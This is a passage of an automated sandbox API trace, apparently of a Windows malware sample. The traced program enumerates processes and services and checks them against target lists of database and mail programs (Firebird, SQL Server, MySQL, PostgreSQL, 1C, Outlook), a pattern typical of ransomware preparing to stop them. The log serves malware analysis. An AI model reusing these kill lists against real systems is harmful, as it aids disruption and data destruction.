lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.920] lstrlenW (lpString="spoolsv.exe") returned 11 [0257.920] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.921] lstrlenW (lpString="taskhost.exe") returned 12 [0257.921] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.921] lstrlenW (lpString="svchost.exe") returned 11 [0257.921] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0257.921] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0257.921] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0257.922] lstrlenW (lpString="reader_sl.exe") returned 13 [0257.922] Process32NextW (in: hSnapshot=0x3b0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0257.922] CloseHandle (hObject=0x3b0) returned 1 [0257.922] Sleep (dwMilliseconds=0x1f4) [0258.940] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea4e8 [0259.118] EnumServicesStatusExW (in: hSCManager=0x47ea4e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0259.119] GetLastError () returned 0xea [0259.119] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0259.119] EnumServicesStatusExW (in: hSCManager=0x47ea4e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0259.119] CloseServiceHandle (hSCObject=0x47ea4e8) returned 1 [0259.120] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0259.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0259.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0259.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0259.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0259.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0259.120] lstrlenW (lpString="AudioSrv") returned 8 [0259.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0259.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0259.120] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0259.120] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0259.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0259.120] lstrlenW (lpString="BFE") returned 3 [0259.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0259.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0259.120] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0259.120] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0259.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0259.120] lstrlenW (lpString="CryptSvc") returned 8 [0259.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0259.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0259.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0259.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0259.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0259.120] lstrlenW (lpString="CscService") returned 10 [0259.120] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0259.120] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0259.120] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0259.120] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0259.120] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0259.120] lstrlenW (lpString="DcomLaunch") returned 10 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0259.121] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0259.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0259.121] lstrlenW (lpString="Dhcp") returned 4 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0259.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0259.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0259.121] lstrlenW (lpString="Dnscache") returned 8 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0259.121] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0259.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0259.121] lstrlenW (lpString="DPS") returned 3 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0259.121] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0259.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0259.121] lstrlenW (lpString="eventlog") returned 8 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0259.121] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0259.121] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0259.121] lstrlenW (lpString="EventSystem") returned 11 [0259.121] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0259.121] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0259.121] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0259.122] lstrlenW (lpString="gpsvc") returned 5 [0259.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0259.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0259.122] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0259.122] lstrlenW (lpString="LanmanWorkstation") returned 17 [0259.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0259.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0259.122] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0259.122] lstrlenW (lpString="lmhosts") returned 7 [0259.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0259.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0259.122] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0259.122] lstrlenW (lpString="MMCSS") returned 5 [0259.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0259.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0259.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0259.122] lstrlenW (lpString="MpsSvc") returned 6 [0259.122] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0259.122] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0259.122] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0259.122] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0259.122] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0259.123] lstrlenW (lpString="NlaSvc") returned 6 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0259.123] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0259.123] lstrlenW (lpString="nsi") returned 3 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0259.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0259.123] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0259.123] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0259.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0259.123] lstrlenW (lpString="PcaSvc") returned 6 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0259.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0259.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0259.123] lstrlenW (lpString="PlugPlay") returned 8 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0259.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0259.123] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0259.123] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0259.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0259.123] lstrlenW (lpString="Power") returned 5 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0259.123] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0259.123] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0259.123] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0259.123] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0259.123] lstrlenW (lpString="ProfSvc") returned 7 [0259.123] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0259.124] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0259.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0259.124] lstrlenW (lpString="RpcEptMapper") returned 12 [0259.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0259.124] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0259.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0259.124] lstrlenW (lpString="RpcSs") returned 5 [0259.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0259.124] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0259.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0259.124] lstrlenW (lpString="SamSs") returned 5 [0259.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0259.124] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0259.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0259.124] lstrlenW (lpString="Schedule") returned 8 [0259.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0259.124] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0259.124] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0259.124] lstrlenW (lpString="SENS") returned 4 [0259.124] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0259.124] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0259.124] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0259.125] lstrlenW (lpString="ShellHWDetection") returned 16 [0259.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0259.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0259.125] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0259.125] lstrlenW (lpString="Spooler") returned 7 [0259.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0259.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0259.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0259.125] lstrlenW (lpString="SysMain") returned 7 [0259.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0259.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0259.125] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0259.125] lstrlenW (lpString="Themes") returned 6 [0259.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0259.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0259.125] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0259.125] lstrlenW (lpString="TrkWks") returned 6 [0259.125] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0259.125] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0259.125] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0259.125] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0259.125] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0259.126] lstrlenW (lpString="UxSms") returned 5 [0259.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0259.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0259.126] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0259.126] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0259.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0259.126] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0259.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c8 [0259.128] Process32FirstW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.129] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.129] lstrlenW (lpString="System") returned 6 [0259.129] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0259.129] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0259.129] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.129] lstrlenW (lpString="smss.exe") returned 8 [0259.129] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0259.129] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0259.130] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.130] lstrlenW (lpString="csrss.exe") returned 9 [0259.130] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0259.130] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0259.130] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0259.130] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0259.130] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0259.130] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0259.130] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0259.130] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.130] lstrlenW (lpString="wininit.exe") returned 11 [0259.130] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0259.130] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0259.130] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.131] lstrlenW (lpString="csrss.exe") returned 9 [0259.131] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0259.131] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0259.131] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0259.131] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0259.131] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0259.131] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0259.131] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0259.131] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.131] lstrlenW (lpString="winlogon.exe") returned 12 [0259.131] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0259.131] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0259.131] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.132] lstrlenW (lpString="services.exe") returned 12 [0259.132] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0259.132] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0259.132] Process32NextW (in: hSnapshot=0x3c8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.132] lstrlenW (lpString="lsass.exe") returned 9 [0259.132] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0259.132] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0259.132] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0259.132] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0259.132] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0259.132] lstrcmpiW 